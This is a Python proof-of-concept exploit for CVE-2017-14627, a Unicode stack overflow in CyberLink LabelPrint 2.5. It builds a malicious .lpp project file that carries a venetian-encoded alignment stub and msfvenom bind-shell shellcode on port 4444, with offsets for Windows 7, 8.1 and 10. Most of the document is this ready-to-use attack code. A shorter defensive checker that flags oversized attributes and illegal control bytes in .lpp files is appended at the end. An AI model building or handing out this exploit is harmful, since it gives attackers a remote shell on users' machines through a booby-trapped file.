#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.

def exp():
    header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
              "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
              "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
              "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
              "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
              "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
              "\x30\x31\x37\x22\x3e")
    filename2 = "labelprint_poc_universal.lpp"
    f = open(filename2, 'w')
    junk = "A" * 790
    nseh = "\x61\x42"
    seh = "\x2c\x44"
    nop = "\x42"
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
    buf = ""
    buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"

    #preparing address for decoding
    ven = nop  #nop/inc edx
    ven += "\x54"  #push esp
    ven += nop  #nop/inc edx
    ven += "\x58"  #pop eax
    ven += nop  #nop/inc edx
    ven += "\x05\x1B\x01"  #add eax 01001B00 universal
    ven += nop  #nop/inc edx
    ven += "\x2d\x01\x01"  #sub eax 01001000
    ven += nop  #nop/inc edx
    ven += "\x50"  #push eax
    ven += nop  #nop/inc edx
    ven += "\x5c"  #pop esp

    #we need to encode the RET address, since C3 is bad char.
    #preparing ret opcode
    ven += nop  #nop/inc edx
    ven += "\x25\x7e\x7e"  #and eax,7e007e00
    ven += nop  #nop/inc edx
    ven += "\x25\x01\x01"  #and eax,01000100
    ven += nop  #nop/inc edx
    ven += "\x35\x7f\x7f"  #xor eax,7f007f00
    ven += nop  #nop/inc edx
    ven += "\x05\x44\x44"  #add eax,44004400
    ven += nop  #nop/inc edx
    ven += "\x57"  #push edi
    ven += nop  #nop/inc edx
    ven += "\x50"  #push eax
    ven += junk2  #depending OS

    #custom venetian
    ven += "\x58"  #pop eax
    ven += nop  #nop/inc edx
    ven += "\x58"  #pop eax
    ven += nop  #nop/inc edx
    ven += align  #depending OS
    ven += nop  #nop/inc edx
    ven += "\x2d\x01\x01"  #add eax, 01000100 #align eax to our buffer
    ven += nop  #nop/inc edx
    ven += "\x50"  #push eax
    ven += nop  #nop/inc edx

    #call esp 0x7c32537b MFC71U.dll
    ven += "\x5C"  #pop esp
    ven += nop  #nop/inc edx
    ven += "\x58"  #pop eax
    ven += nop  #nop/inc edx
    ven += "\x05\x53\x7c"  #add eax 7c005300 part of call esp
    ven += nop  #nop/inc edx
    ven += "\x50"  #push eax
    ven += junk1  #depending OS
    ven += "\x7b\x32"  #part of call esp

    #preparing for shellcode
    ven += nop * 114  #junk
    ven += "\x57"  #push edi
    ven += nop  #nop/inc edx
    ven += "\x58"  #pop eax
    ven += nop  #nop/inc edx
    ven += align2  #depending OS
    ven += nop  #nop/inc edx
    ven += "\x2d\x01\x01"  #sub eax,01000100
    ven += nop  #nop/inc edx
    ven += buf  #shellcode

    sisa = nop * (15000 - len(junk + nseh + seh + ven))
    payload = junk + nseh + seh + ven + sisa

    bug = "\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d" + '"' + payload + '"' + "/>\n"
    bug += ("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
            "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
    f.write(header + "\n" + bug)
    print "[+] File", filename2, "successfully created!"
    print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
    print "[*] Good luck ;)"
    f.close()

print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
    if input == 1:
        align = "\x05\x09\x01"  #add eax,01000400
        align2 = "\x05\x0A\x01"  #add eax, 01000900
        junk1 = '\x42' * 68  #junk for win7x86
        junk2 = '\x42' * 893  #junk for win7x86
        exp()
    elif input == 2:
        align = "\x05\x09\x01"  #add eax,01000400
        align2 = "\x05\x0A\x01"  #add eax, 01000900
        junk1 = '\x42' * 116  #junk for win8.1x64
        junk2 = '\x42' * 845  #junk for win8.1x64
        exp()
    elif input == 3:
        align = "\x05\x05\x01"  #add eax,01000400
        align2 = "\x05\x06\x01"  #add eax, 01000900
        junk1 = '\x42' * 136  #junk for win10x64
        junk2 = '\x42' * 313  #junk for win10x64
        exp()
    else:
        print "Choose the right one :)"
except:
    print ""
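Added here as a defender-side companion, not part of f3ci's PoC: a checker that reads a LabelPrint .lpp project as text and flags the two properties the file produced above would carry. The header bytes in the PoC decode to a small PROJECT/INFORMATION/TRACK XML document, and the trigger is a TRACK name attribute padded to 15000 characters that also contains C0 control bytes (\x01, \x05, \x1b) from the unicode venetian stub, which no XML 1.0 parser accepts. The 1024-character threshold, the function names and the three sample documents are constructed for this example; the element layout is taken from the PoC's header.

```python
import re
import xml.etree.ElementTree as ET

# Constructed threshold for this example: a disc label title is never anywhere near
# this long, while the PoC pads the TRACK name attribute out to 15000 characters.
MAX_ATTR_LEN = 1024

# XML 1.0 forbids the C0 control characters other than tab, LF and CR. The PoC's
# venetian stub carries bytes such as \x01, \x05 and \x1b, which a project file saved
# by LabelPrint itself would never contain.
ILLEGAL_XML_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")

# Fallback attribute scanner, used only when the XML parser rejects the document.
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def inspect_lpp(text):
    """Return a list of human-readable findings for one project file (empty list = clean)."""
    findings = []
    if ILLEGAL_XML_CHARS.search(text):
        findings.append("control characters present (not valid XML 1.0)")
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        findings.append("does not parse as XML: %s" % exc)
        root = None
    if root is not None:
        # Well-formed document: measure every attribute value the parser saw.
        for elem in root.iter():
            for attr, value in elem.attrib.items():
                if len(value) > MAX_ATTR_LEN:
                    findings.append("%s/@%s is %d chars long" % (elem.tag, attr, len(value)))
    else:
        # Parser gave up (typically on the control bytes); fall back to a regex so the
        # oversized attribute is still reported rather than hidden behind the parse error.
        for m in ATTR_RE.finditer(text):
            if len(m.group(2)) > MAX_ATTR_LEN:
                findings.append("attribute %s is %d chars long" % (m.group(1), len(m.group(2))))
    return findings


def inspect_lpp_file(path):
    """Read a project file with latin-1 so every byte survives decoding, then inspect it."""
    with open(path, encoding="latin-1") as fh:
        return inspect_lpp(fh.read())


# Constructed samples. BENIGN mirrors the element layout the PoC's hex header decodes
# to, with an ordinary label; the other two carry a TRACK name of the kind the PoC writes.
BENIGN = ('<PROJECT version="1.0.00">\n'
          '\t<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">\n'
          '\t\t<TRACK name="Holiday mix"/>\n'
          '\t</INFORMATION>\n'
          '</PROJECT>')
OVERSIZED = BENIGN.replace('name="Holiday mix"', 'name="%s"' % ("A" * 15000))
WITH_CONTROL_BYTES = BENIGN.replace('name="Holiday mix"',
                                    'name="%s"' % ("A" * 2000 + "\x05\x1b\x01" + "B" * 100))

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED),
                          ("control bytes", WITH_CONTROL_BYTES)):
        print(label, "->", inspect_lpp(sample) or "clean")
```

Run it against a directory of .lpp files with inspect_lpp_file; any file that either fails to parse or carries an attribute over the threshold is worth quarantining before a user on an unpatched LabelPrint 2.5 opens it.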